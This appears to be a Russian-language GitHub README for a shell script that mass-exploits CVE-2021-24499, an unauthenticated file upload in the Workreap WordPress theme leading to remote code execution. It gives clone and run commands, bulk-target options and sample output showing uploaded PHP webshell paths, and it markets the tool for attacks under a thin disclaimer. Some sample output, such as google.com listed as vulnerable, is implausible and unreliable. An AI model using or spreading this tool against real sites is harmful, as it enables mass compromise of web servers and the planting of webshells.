
Тема WordPress Workreap 2.2.2 - неаутентифицированная загрузка, приводящая к удалённому выполнению кода
WordPress-тема Workreap 2.2.2 — Неаутентифицированная загрузка файлов, приводящая к удалённому выполнению кода
Мощный и точный инструмент массовой эксплуатации уязвимости CVE-2021-24499 в теме WordPress Workreap. Этот эксплойт позволяет неаутентифицированную загрузку файлов, что может привести к удалённому выполнению кода (RCE).
CVE-2021-24499 — критическая уязвимость в теме WordPress Workreap (версии 2.2.2 и ниже), которая позволяет неаутентифицированным пользователям загружать произвольные файлы, включая PHP-файлы, через AJAX-действие workreap_award_temp_file_uploader. Это может привести к удалённому выполнению кода (RCE) на целевом сервере.
Уязвимые версии: все версии вплоть до 2.2.2 включительно
Оценка CVSS: критическая
curlopts.php или shell.php (PHP-вебшелл)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php или shell.php в той же директории (ваш PHP-вебшелл)Одиночная цель:
./exploit.sh -u http://target.com
Несколько целей (из файла):
./exploit.sh -l targets.txt
Показать справку:
./exploit.sh --help
| Option | Description |
|---|---|
-u URL | Эксплуатировать одну целевую URL |
-l FILE | Эксплуатировать несколько целей из файла (по одной URL в строке) |
--help | Показать меню справки |
Создайте текстовый файл с одной URL в строке:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования.
Используя этот инструмент, вы соглашаетесь использовать его только в законных целях тестирования безопасности и исследований.
Автор: Jay Maranatha Hutajulu
Этот проект лицензируется под лицензией MIT — подробности см. в файле LICENSE.
Приветствуются вклад, сообщения об ошибках и запросы новых функций! Загляните на страницу issues.
Если вы находите этот инструмент полезным, пожалуйста, подумайте о том, чтобы поставить ему звезду ⭐
Помните: всегда используйте инструменты безопасности ответственно и этично. Удачного взлома! 🚀